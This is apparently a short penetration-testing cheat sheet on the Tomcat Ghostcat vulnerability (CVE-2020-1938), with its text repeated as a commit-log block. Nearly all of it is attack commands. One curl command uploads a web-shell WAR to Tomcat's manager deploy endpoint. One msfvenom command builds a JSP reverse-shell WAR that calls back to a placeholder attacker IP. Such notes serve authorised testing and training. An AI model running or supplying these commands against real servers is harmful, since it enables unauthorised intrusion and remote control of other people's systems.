killchain-compendium/exploit/java/ghostcat.md

# Ghostcat

* CVE-2020-1938
* Msfconsole or [exploitdb](https://www.exploit-db.com/exploits/48143)
* Craft a manual war shell shown at [hacktrick's tomcat site](https://book.hacktricks.xyz/pentesting/pentesting-web/tomcat#reverse-shell)
* upload the file via
```sh
curl -T ./webshell.war -u 'user:password' http://$TARGET_IP:8080/manager/text/deploy?path=/shello
``` 
* Visit the webshell at `$TARGET_IP:8080/shello/`
* Alternatively use a war reverse shell via
```sh
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=4449 -f war -o revshell.war
```
bump 2022-02-07 23:37:05 +01:00			`# Ghostcat`

			`* CVE-2020-1938`
			`* Msfconsole or [exploitdb](https://www.exploit-db.com/exploits/48143)`
			`* Craft a manual war shell shown at [hacktrick's tomcat site](https://book.hacktricks.xyz/pentesting/pentesting-web/tomcat#reverse-shell)`
			`* upload the file via`
			```sh
			`curl -T ./webshell.war -u 'user:password' http://$TARGET_IP:8080/manager/text/deploy?path=/shello`
			```
			* Visit the webshell at `$TARGET_IP:8080/shello/`
			`* Alternatively use a war reverse shell via`
			```sh
			`msfvenom -p java/jsp_shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=4449 -f war -o revshell.war`
			```